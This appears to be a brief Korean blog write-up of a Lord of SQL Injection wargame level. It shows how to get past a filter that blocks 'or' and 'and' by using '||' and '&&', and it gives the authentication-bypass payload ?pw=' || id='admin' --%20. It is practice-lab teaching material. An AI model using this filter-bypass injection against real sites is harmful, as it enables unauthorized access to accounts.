별 다를 거 없는 필터링 문제이다.
'or' 와 'and' 사용을 필터링 하고 있다.
하지만 우리에겐 좋은 대체품이 있다.
or = ||
and = &&
원래의 쿼리는 ?pw=' or id='admin' --%20
이지만 or 라는 문자가 막힐게 뻔하니,
or 를 대체해서 쿼리를 짜보면
?pw=' || id='admin' --%20
클리ㅇㅓ~~
'Wargame > LOS(Load of SQL Injection) Writeup' 카테고리의 다른 글
| AUTO blind SQL Tools (이진탐색버전) (feat. LOS no.4 orc) (0) | 2022.02.17 |
|---|---|
| LOS(Load of SQL Injection) 5번 문제 풀이 (0) | 2020.04.30 |
| LOS(Load of SQL Injection) 3번 문제 풀이 (1) | 2020.04.30 |
| LOS(Load of SQL Injection) 2번 문제 풀이 (0) | 2020.04.30 |
| LOS(Load of SQL Injection) 1번 문제 풀이 (1) | 2020.04.30 |
